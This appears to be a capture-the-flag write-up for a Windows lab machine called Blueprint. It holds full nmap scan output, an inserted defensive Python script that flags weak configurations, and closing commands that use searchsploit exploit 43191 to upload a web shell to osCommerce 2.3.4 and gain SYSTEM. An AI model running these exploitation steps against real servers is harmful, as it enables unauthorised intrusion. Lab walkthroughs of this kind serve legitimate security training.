$ sudo rustscan -b 8192 -u 16384 -a 10.10.112.251 -- -sS -sV -sC -oN 10.10.112.251.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Thu Dec 16 16:54:55 2021 as: nmap -vvv -p 80,139,135,445,443,3306,8080,49160,49159,49153,49154,49152,49158 -sS -sV -sC -oN 10.10.112.251.blueprint.nmap.txt 10.10.112.251
Nmap scan report for 10.10.112.251
Host is up, received syn-ack ttl 125 (0.28s latency).
Scanned at 2021-12-16 16:54:57 PST for 82s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 7.5
|_http-title: 404 - File or directory not found.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 125 MariaDB (unauthorized)
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
49152/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49160/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:7b:99:93:7f:19 (unknown)
| Names:
| BLUEPRINT<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| BLUEPRINT<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \\x01\\x02__MSBROWSE__\\x02<01> Flags: <group><active>
| Statistics:
| 02 7b 99 93 7f 19 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: BLUEPRINT
| NetBIOS computer name: BLUEPRINT\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2021-12-17T00:56:04+00:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-17T00:56:06
|_ start_date: 2021-12-17T00:52:52
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 49066/tcp): CLEAN (Couldn't connect)
| Check 2 (port 55652/tcp): CLEAN (Couldn't connect)
| Check 3 (port 30886/udp): CLEAN (Timeout)
| Check 4 (port 20461/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Dec 16 16:56:19 2021 -- 1 IP address (1 host up) scanned in 84.36 seconds
Based on the output of the rustscan/nmap scan we can easily tell that this is a Windows machine.
| Port | Findings |
|---|---|
| 80 | Windows IIS web server |
| 443/8080 | Apache web server with directory browsing enabled (Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 Server at 10.10.112.251 Port 8080); folder titled "oscommerce-2.3.4" |
| 135/139/445 | NetBIOS / Samba / NFS |
| 3306 | MariaDB |
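As an added, defender-oriented example (not part of the original writeup), a small Python script that triages an nmap -oN report in the shape of the scan above into the weak-configuration findings the table hints at: TRACE enabled, directory listing, a 1024-bit SHA-1 certificate that expired in 2019, and SMB signing disabled. The sample report is a constructed excerpt of the scan, and the hardening hints are my own, not nmap output.

```python
import re
from datetime import datetime

# Constructed excerpt in the shape of the nmap -oN/-vvv output on this page (not the full scan).
SAMPLE_NMAP = """\
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 7.5
|_ Potentially risky methods: TRACE
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid after: 2019-11-08T23:48:47
Host script results:
|_ message_signing: disabled (dangerous, but default)
"""
SCAN_DATE = datetime(2021, 12, 16)  # date of the scan on this page

# A port line in this scan's shape: "<port>/<proto> open <service> <reason> ttl <n> <version>"
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)\s+.*?ttl\s+\d+\s+(.*)$")

RULES = [  # (pattern on an NSE script line, finding, hardening hint); hints are mine, not nmap output
    (r"Potentially risky methods:.*\bTRACE\b", "HTTP TRACE enabled", "TraceEnable off / disable TRACE"),
    (r"http-title: Index of /", "directory listing enabled", "Options -Indexes"),
    (r"Signature Algorithm: sha1", "certificate signed with SHA-1", "reissue with SHA-256"),
    (r"message_signing: disabled", "SMB signing disabled", "require SMB signing via policy"),
]

def triage(report, scan_date):
    """Walk an nmap -oN report; return (port, finding, hint) tuples, 'host' for host scripts."""
    findings, port = [], "host"
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:                                   # new port section: following | lines belong to it
            port = m.group(1)
            continue
        if line.startswith("Host script results"):
            port = "host"
            continue
        if not line.startswith("|"):            # only NSE script output carries the findings
            continue
        for pattern, finding, hint in RULES:
            if re.search(pattern, line):
                findings.append((port, finding, hint))
        m = re.search(r"Public Key bits: (\d+)", line)
        if m and int(m.group(1)) < 2048:
            findings.append((port, f"weak RSA key ({m.group(1)} bits)", "use >= 2048-bit keys"))
        m = re.search(r"Not valid after: (\S+)", line)
        if m and datetime.fromisoformat(m.group(1)) < scan_date:
            findings.append((port, f"certificate expired {m.group(1)[:10]}", "renew the certificate"))
    return findings
```

Running `triage(SAMPLE_NMAP, SCAN_DATE)` yields six findings: TRACE on 80, directory listing plus the weak, SHA-1-signed, expired certificate on 443, and SMB signing disabled at host level.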
Through enumeration and dirbusting we're eventually supposed to find that we can install OSCommerce ourselves... and then exploit it. Gee golly.
The OSCommerce installer is at /catalog/install/. Database username: root, no password, any database name.
Then use the osCommerce 2.3.4.1 Authenticated Arbitrary File Upload exploit:
$ searchsploit -m php/webapps/43191.py
$ ./43191.py -u http://10.10.112.251:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php
From here you are NT Authority/system. Enjoy.